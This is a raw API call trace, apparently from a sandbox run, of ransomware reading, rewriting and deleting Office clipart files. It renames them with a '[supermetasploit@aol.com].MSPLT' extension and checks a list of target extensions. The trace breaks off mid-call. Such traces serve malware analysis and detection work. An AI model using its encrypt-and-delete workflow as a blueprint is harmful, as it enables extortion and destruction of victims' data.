0xffffffff [0295.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0295.592] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.592] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0295.592] GetLastError () returned 0x0 [0295.592] ReadFile (in: hFile=0x464, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x3f34, lpOverlapped=0x0) returned 1 [0295.604] WriteFile (in: hFile=0x37c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x3f40, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x3f40, lpOverlapped=0x0) returned 1 [0295.605] ReadFile (in: hFile=0x464, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0295.605] WriteFile (in: hFile=0x37c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0295.605] SetEndOfFile (hFile=0x37c) returned 1 [0295.605] CloseHandle (hObject=0x37c) returned 1 [0295.607] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.607] SetEndOfFile (hFile=0x464) returned 1 [0295.611] CloseHandle (hObject=0x464) returned 1 [0295.612] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0295.613] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf")) returned 1 [0295.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0295.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0295.614] lstrlenW (lpString=".doc") returned 4 [0295.614] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.614] lstrlenW (lpString=".docx") returned 5 [0295.614] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.614] lstrlenW (lpString=".pdf") returned 4 [0295.614] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.614] lstrlenW (lpString=".xls") returned 4 [0295.614] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.614] lstrlenW (lpString=".xlsx") returned 5 [0295.614] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.614] lstrlenW (lpString=".ppt") returned 4 [0295.614] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0295.614] lstrlenW (lpString=".zip") returned 4 [0295.614] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.614] lstrlenW (lpString=".rar") returned 4 [0295.614] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.614] lstrlenW (lpString=".bz2") returned 4 [0295.614] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.615] lstrlenW (lpString=".7z") returned 3 [0295.615] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0295.615] lstrlenW (lpString=".dbf") returned 4 [0295.615] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0295.615] lstrlenW (lpString=".1cd") returned 4 [0295.615] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0295.615] lstrlenW (lpString=".jpg") returned 4 [0295.615] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0295.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0295.615] lstrlenW (lpString=".doc") returned 4 [0295.615] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.615] lstrlenW (lpString=".docx") returned 5 [0295.615] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.615] lstrlenW (lpString=".pdf") returned 4 [0295.615] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.615] lstrlenW (lpString=".xls") returned 4 [0295.615] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.615] lstrlenW (lpString=".xlsx") returned 5 [0295.615] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.615] lstrlenW (lpString=".ppt") returned 4 [0295.615] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0295.616] lstrlenW (lpString=".zip") returned 4 [0295.616] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.616] lstrlenW (lpString=".rar") returned 4 [0295.616] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.616] lstrlenW (lpString=".bz2") returned 4 [0295.616] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.616] lstrlenW (lpString=".7z") returned 3 [0295.616] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0295.616] lstrlenW (lpString=".dbf") returned 4 [0295.616] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0295.616] lstrlenW (lpString=".1cd") returned 4 [0295.616] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 68 [0295.616] lstrlenW (lpString=".jpg") returned 4 [0295.616] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.616] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0295.616] lstrlenW (lpString="BD05119_.WMF") returned 12 [0295.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd05119_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0295.976] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=17236) returned 1 [0296.000] CloseHandle (hObject=0x4c8) returned 1 [0296.000] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd05119_.wmf")) returned 0x220 [0296.000] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd05119_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd05119_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0296.001] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.001] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd05119_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4cc [0296.002] GetLastError () returned 0x0 [0296.002] ReadFile (in: hFile=0x4c8, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x4354, lpOverlapped=0x0) returned 1 [0296.006] WriteFile (in: hFile=0x4cc, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x4360, lpOverlapped=0x0) returned 1 [0296.008] ReadFile (in: hFile=0x4c8, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0296.008] WriteFile (in: hFile=0x4cc, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0296.008] SetEndOfFile (hFile=0x4cc) returned 1 [0296.008] CloseHandle (hObject=0x4cc) returned 1 [0296.016] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.016] SetEndOfFile (hFile=0x4c8) returned 1 [0296.020] CloseHandle (hObject=0x4c8) returned 1 [0296.020] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0296.021] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd05119_.wmf")) returned 1 [0296.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 68 [0296.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 68 [0296.022] lstrlenW (lpString=".doc") returned 4 [0296.022] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0296.022] lstrlenW (lpString=".docx") returned 5 [0296.022] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0296.022] lstrlenW (lpString=".pdf") returned 4 [0296.022] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0296.022] lstrlenW (lpString=".xls") returned 4 [0296.022] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0296.022] lstrlenW (lpString=".xlsx") returned 5 [0296.022] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0296.022] lstrlenW (lpString=".ppt") returned 4 [0296.022] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0296.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 68 [0296.022] lstrlenW (lpString=".zip") returned 4 [0296.022] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0296.022] lstrlenW (lpString=".rar") returned 4 [0296.022] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0296.022] lstrlenW (lpString=".bz2") returned 4 [0296.022] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0296.022] lstrlenW (lpString=".7z") returned 3 [0296.022] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0296.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 68 [0296.022] lstrlenW (lpString=".dbf") returned 4 [0296.022] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0296.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 68 [0296.023] lstrlenW (lpString=".1cd") returned 4 [0296.023] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0296.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 68 [0296.023] lstrlenW (lpString=".jpg") returned 4 [0296.023] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0296.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 68 [0296.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 68 [0296.023] lstrlenW (lpString=".doc") returned 4 [0296.023] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0296.023] lstrlenW (lpString=".docx") returned 5 [0296.023] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0296.023] lstrlenW (lpString=".pdf") returned 4 [0296.023] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0296.023] lstrlenW (lpString=".xls") returned 4 [0296.023] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0296.023] lstrlenW (lpString=".xlsx") returned 5 [0296.023] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0296.023] lstrlenW (lpString=".ppt") returned 4 [0296.023] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0296.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 68 [0296.023] lstrlenW (lpString=".zip") returned 4 [0296.023] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0296.024] lstrlenW (lpString=".rar") returned 4 [0296.024] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0296.024] lstrlenW (lpString=".bz2") returned 4 [0296.024] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0296.024] lstrlenW (lpString=".7z") returned 3 [0296.024] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0296.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 68 [0296.024] lstrlenW (lpString=".dbf") returned 4 [0296.024] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0296.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 68 [0296.024] lstrlenW (lpString=".1cd") returned 4 [0296.024] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0296.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 68 [0296.024] lstrlenW (lpString=".jpg") returned 4 [0296.024] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0296.024] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0296.024] lstrlenW (lpString="BD07761_.WMF") returned 12 [0296.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07761_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0296.026] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=26748) returned 1 [0296.026] CloseHandle (hObject=0x4c8) returned 1 [0296.026] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07761_.wmf")) returned 0x220 [0296.026] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07761_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.026] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07761_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0296.026] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.027] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.027] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07761_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4cc [0296.027] GetLastError () returned 0x0 [0296.027] ReadFile (in: hFile=0x4c8, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x687c, lpOverlapped=0x0) returned 1 [0296.032] WriteFile (in: hFile=0x4cc, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x6880, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x6880, lpOverlapped=0x0) returned 1 [0296.034] ReadFile (in: hFile=0x4c8, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0296.034] WriteFile (in: hFile=0x4cc, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0296.034] SetEndOfFile (hFile=0x4cc) returned 1 [0296.035] CloseHandle (hObject=0x4cc) returned 1 [0296.036] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.036] SetEndOfFile (hFile=0x4c8) returned 1 [0296.433] CloseHandle (hObject=0x4c8) returned 1 [0296.434] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0296.435] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07761_.wmf")) returned 1 [0296.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 68 [0296.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 68 [0296.436] lstrlenW (lpString=".doc") returned 4 [0296.436] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0296.436] lstrlenW (lpString=".docx") returned 5 [0296.436] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0296.436] lstrlenW (lpString=".pdf") returned 4 [0296.436] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0296.436] lstrlenW (lpString=".xls") returned 4 [0296.436] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0296.436] lstrlenW (lpString=".xlsx") returned 5 [0296.436] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0296.436] lstrlenW (lpString=".ppt") returned 4 [0296.436] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0296.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 68 [0296.436] lstrlenW (lpString=".zip") returned 4 [0296.436] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0296.436] lstrlenW (lpString=".rar") returned 4 [0296.436] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0296.436] lstrlenW (lpString=".bz2") returned 4 [0296.437] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0296.437] lstrlenW (lpString=".7z") returned 3 [0296.437] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0296.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 68 [0296.437] lstrlenW (lpString=".dbf") returned 4 [0296.437] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0296.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 68 [0296.437] lstrlenW (lpString=".1cd") returned 4 [0296.437] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0296.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 68 [0296.437] lstrlenW (lpString=".jpg") returned 4 [0296.437] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0296.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 68 [0296.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 68 [0296.437] lstrlenW (lpString=".doc") returned 4 [0296.437] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0296.437] lstrlenW (lpString=".docx") returned 5 [0296.437] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0296.437] lstrlenW (lpString=".pdf") returned 4 [0296.437] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0296.437] lstrlenW (lpString=".xls") returned 4 [0296.437] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0296.437] lstrlenW (lpString=".xlsx") returned 5 [0296.437] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0296.437] lstrlenW (lpString=".ppt") returned 4 [0296.437] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0296.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 68 [0296.438] lstrlenW (lpString=".zip") returned 4 [0296.438] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0296.438] lstrlenW (lpString=".rar") returned 4 [0296.438] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0296.438] lstrlenW (lpString=".bz2") returned 4 [0296.438] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0296.438] lstrlenW (lpString=".7z") returned 3 [0296.438] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0296.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 68 [0296.438] lstrlenW (lpString=".dbf") returned 4 [0296.438] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0296.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 68 [0296.438] lstrlenW (lpString=".1cd") returned 4 [0296.438] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0296.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 68 [0296.438] lstrlenW (lpString=".jpg") returned 4 [0296.438] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0296.438] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0296.438] lstrlenW (lpString="BD08773_.WMF") returned 12 [0296.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08773_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0296.439] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=24778) returned 1 [0296.439] CloseHandle (hObject=0x4c8) returned 1 [0296.439] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08773_.wmf")) returned 0x220 [0296.440] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08773_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.440] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08773_.wmf"), dwDesiredAccess=0xc0000000, 